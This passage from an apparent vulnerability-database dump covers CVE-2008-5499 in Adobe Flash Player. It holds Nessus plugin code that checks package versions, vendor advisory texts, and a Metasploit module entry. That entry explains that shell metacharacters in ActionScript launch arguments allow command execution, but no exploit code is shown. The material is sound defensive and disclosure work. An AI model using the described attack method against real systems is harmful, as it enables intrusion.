audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"flash-player-10.0.15.3-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:56:33", "description": "An updated Adobe Flash Player package that fixes a security issue is\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe flash-plugin package contains a Firefox-compatible Adobe Flash\nPlayer Web browser plug-in.\n\nA security flaw was found in the way Flash Player displayed certain\nSWF (Shockwave Flash) content. This may have made it possible to\nexecute arbitrary code on a victim's machine, if the victim opened a\nmalicious Adobe Flash file. (CVE-2008-5499)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.0.15.3 for users of Red Hat\nEnterprise Linux 5 Supplementary, and 9.0.152.0 for users of Red Hat\nEnterprise 3 and 4 Extras.", "edition": 26, "published": "2009-08-24T00:00:00", "title": "RHEL 3 / 4 / 5 : flash-plugin (RHSA-2008:1047)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5.2", "cpe:/o:redhat:enterprise_linux:4.7"], "id": "REDHAT-RHSA-2008-1047.NASL", "href": "https://www.tenable.com/plugins/nessus/40736", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:1047. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40736);\n script_version (\"1.42\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-5499\");\n script_bugtraq_id(32896);\n script_xref(name:\"RHSA\", value:\"2008:1047\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : flash-plugin (RHSA-2008:1047)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes a security issue is\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe flash-plugin package contains a Firefox-compatible Adobe Flash\nPlayer Web browser plug-in.\n\nA security flaw was found in the way Flash Player displayed certain\nSWF (Shockwave Flash) content. This may have made it possible to\nexecute arbitrary code on a victim's machine, if the victim opened a\nmalicious Adobe Flash file. (CVE-2008-5499)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.0.15.3 for users of Red Hat\nEnterprise Linux 5 Supplementary, and 9.0.152.0 for users of Red Hat\nEnterprise 3 and 4 Extras.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5499\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb08-24.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb08-24.html\"\n );\n # http://www.adobe.com/products/flashplayer/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/products/flashplayer/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:1047\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:1047\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"flash-plugin-9.0.152.0-1.el3.with.oss\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"flash-plugin-9.0.152.0-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.0.15.3-2.el5\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:30:11", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file. (CVE-2008-5499)", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : flash-player (ZYPP Patch Number 5877)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FLASH-PLAYER-5877.NASL", "href": "https://www.tenable.com/plugins/nessus/51729", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51729);\n script_version (\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:32\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"SuSE 10 Security Update : flash-player (ZYPP Patch Number 5877)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file. (CVE-2008-5499)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5499.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5877.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"flash-player-9.0.152.0-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:30:11", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).", "edition": 23, "published": "2008-12-21T00:00:00", "title": "openSUSE 10 Security Update : flash-player (flash-player-5878)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_FLASH-PLAYER-5878.NASL", "href": "https://www.tenable.com/plugins/nessus/35246", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-5878.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35246);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:32\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"openSUSE 10 Security Update : flash-player (flash-player-5878)\");\n script_summary(english:\"Check for the flash-player-5878 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"flash-player-9.0.152.0-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:28", "description": "The remote host is affected by the vulnerability described in GLSA-200903-23\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player:\n The access scope of SystemsetClipboard() allows ActionScript\n programs to execute the method without user interaction\n (CVE-2008-3873).\n The access scope of FileReference.browse() and\n FileReference.download() allows ActionScript programs to execute the\n methods without user interaction (CVE-2008-4401).\n The Settings Manager controls can be disguised as normal graphical\n elements. This so-called 'clickjacking' vulnerability was disclosed by\n Robert Hansen of SecTheory, Jeremiah Grossman of WhiteHat Security,\n Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu of\n TopsecTianRongXin (CVE-2008-4503).\n Adan Barth (UC Berkely) and Collin Jackson (Stanford University)\n discovered a flaw occurring when interpreting HTTP response headers\n (CVE-2008-4818).\n Nathan McFeters and Rob Carter of Ernst and Young's Advanced\n Security Center are credited for finding an unspecified vulnerability\n facilitating DNS rebinding attacks (CVE-2008-4819).\n When used in a Mozilla browser, Adobe Flash Player does not\n properly interpret jar: URLs, according to a report by Gregory\n Fleischer of pseudo-flaw.net (CVE-2008-4821).\n Alex 'kuza55' K. reported that Adobe Flash Player does not properly\n interpret policy files (CVE-2008-4822).\n The vendor credits Stefano Di Paola of Minded Security for\n reporting that an ActionScript attribute is not interpreted properly\n (CVE-2008-4823).\n Riley Hassell and Josh Zelonis of iSEC Partners reported multiple\n input validation errors (CVE-2008-4824).\n The aforementioned researchers also reported that ActionScript 2\n does not verify a member element's size when performing several known\n and other unspecified actions, that DefineConstantPool accepts an\n untrusted input value for a 'constant count' and that character\n elements are not validated when retrieved from a data structure,\n possibly resulting in a NULL pointer dereference (CVE-2008-5361,\n CVE-2008-5362, CVE-2008-5363).\n The vendor reported an unspecified arbitrary code execution\n vulnerability (CVE-2008-5499).\n Liu Die Yu of TopsecTianRongXin reported an unspecified flaw in the\n Settings Manager related to 'clickjacking' (CVE-2009-0114).\n The vendor credits Roee Hay from IBM Rational Application Security\n for reporting an input validation error when processing SWF files\n (CVE-2009-0519).\n Javier Vicente Vallejo reported via the iDefense VCP that Adobe\n Flash does not remove object references properly, leading to a freed\n memory dereference (CVE-2009-0520).\n Josh Bressers of Red Hat and Tavis Ormandy of the Google Security\n Team reported an untrusted search path vulnerability\n (CVE-2009-0521).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted SWF\n file, possibly resulting in the execution of arbitrary code with the\n privileges of the user or a Denial of Service (crash). Furthermore a\n remote attacker could gain access to sensitive information, disclose\n memory contents by enticing a user to open a specially crafted PDF file\n inside a Flash application, modify the victim's clipboard or render it\n temporarily unusable, persuade a user into uploading or downloading\n files, bypass security restrictions with the assistance of the user to\n gain access to camera and microphone, conduct Cross-Site Scripting and\n HTTP Header Splitting attacks, bypass the 'non-root domain policy' of\n Flash, and gain escalated privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "published": "2009-03-11T00:00:00", "title": "GLSA-200903-23 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "modified": "2009-03-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-200903-23.NASL", "href": "https://www.tenable.com/plugins/nessus/35904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200903-23.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35904);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3873\", \"CVE-2008-4401\", \"CVE-2008-4503\", \"CVE-2008-4818\", \"CVE-2008-4819\", \"CVE-2008-4821\", \"CVE-2008-4822\", \"CVE-2008-4823\", \"CVE-2008-4824\", \"CVE-2008-5361\", \"CVE-2008-5362\", \"CVE-2008-5363\", \"CVE-2008-5499\", \"CVE-2009-0114\", \"CVE-2009-0519\", \"CVE-2009-0520\", \"CVE-2009-0521\");\n script_bugtraq_id(31117, 31537, 32896, 33880, 33889, 33890);\n script_xref(name:\"GLSA\", value:\"200903-23\");\n\n script_name(english:\"GLSA-200903-23 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-23\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player:\n The access scope of SystemsetClipboard() allows ActionScript\n programs to execute the method without user interaction\n (CVE-2008-3873).\n The access scope of FileReference.browse() and\n FileReference.download() allows ActionScript programs to execute the\n methods without user interaction (CVE-2008-4401).\n The Settings Manager controls can be disguised as normal graphical\n elements. This so-called 'clickjacking' vulnerability was disclosed by\n Robert Hansen of SecTheory, Jeremiah Grossman of WhiteHat Security,\n Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu of\n TopsecTianRongXin (CVE-2008-4503).\n Adan Barth (UC Berkely) and Collin Jackson (Stanford University)\n discovered a flaw occurring when interpreting HTTP response headers\n (CVE-2008-4818).\n Nathan McFeters and Rob Carter of Ernst and Young's Advanced\n Security Center are credited for finding an unspecified vulnerability\n facilitating DNS rebinding attacks (CVE-2008-4819).\n When used in a Mozilla browser, Adobe Flash Player does not\n properly interpret jar: URLs, according to a report by Gregory\n Fleischer of pseudo-flaw.net (CVE-2008-4821).\n Alex 'kuza55' K. reported that Adobe Flash Player does not properly\n interpret policy files (CVE-2008-4822).\n The vendor credits Stefano Di Paola of Minded Security for\n reporting that an ActionScript attribute is not interpreted properly\n (CVE-2008-4823).\n Riley Hassell and Josh Zelonis of iSEC Partners reported multiple\n input validation errors (CVE-2008-4824).\n The aforementioned researchers also reported that ActionScript 2\n does not verify a member element's size when performing several known\n and other unspecified actions, that DefineConstantPool accepts an\n untrusted input value for a 'constant count' and that character\n elements are not validated when retrieved from a data structure,\n possibly resulting in a NULL pointer dereference (CVE-2008-5361,\n CVE-2008-5362, CVE-2008-5363).\n The vendor reported an unspecified arbitrary code execution\n vulnerability (CVE-2008-5499).\n Liu Die Yu of TopsecTianRongXin reported an unspecified flaw in the\n Settings Manager related to 'clickjacking' (CVE-2009-0114).\n The vendor credits Roee Hay from IBM Rational Application Security\n for reporting an input validation error when processing SWF files\n (CVE-2009-0519).\n Javier Vicente Vallejo reported via the iDefense VCP that Adobe\n Flash does not remove object references properly, leading to a freed\n memory dereference (CVE-2009-0520).\n Josh Bressers of Red Hat and Tavis Ormandy of the Google Security\n Team reported an untrusted search path vulnerability\n (CVE-2009-0521).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted SWF\n file, possibly resulting in the execution of arbitrary code with the\n privileges of the user or a Denial of Service (crash). Furthermore a\n remote attacker could gain access to sensitive information, disclose\n memory contents by enticing a user to open a specially crafted PDF file\n inside a Flash application, modify the victim's clipboard or render it\n temporarily unusable, persuade a user into uploading or downloading\n files, bypass security restrictions with the assistance of the user to\n gain access to camera and microphone, conduct Cross-Site Scripting and\n HTTP Header Splitting attacks, bypass the 'non-root domain policy' of\n Flash, and gain escalated privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-10.0.22.87'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 79, 94, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 10.0.22.87\"), vulnerable:make_list(\"lt 10.0.22.87\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-23T05:48:45", "description": "This module exploits a vulnerability in Adobe Flash Player for Linux, version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36).\n", "published": "2012-04-10T19:58:22", "type": "metasploit", "title": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2017-08-29T00:17:58", "id": "MSF:EXPLOIT/LINUX/BROWSER/ADOBE_FLASHPLAYER_ASLAUNCH", "href": "", "sourceData": 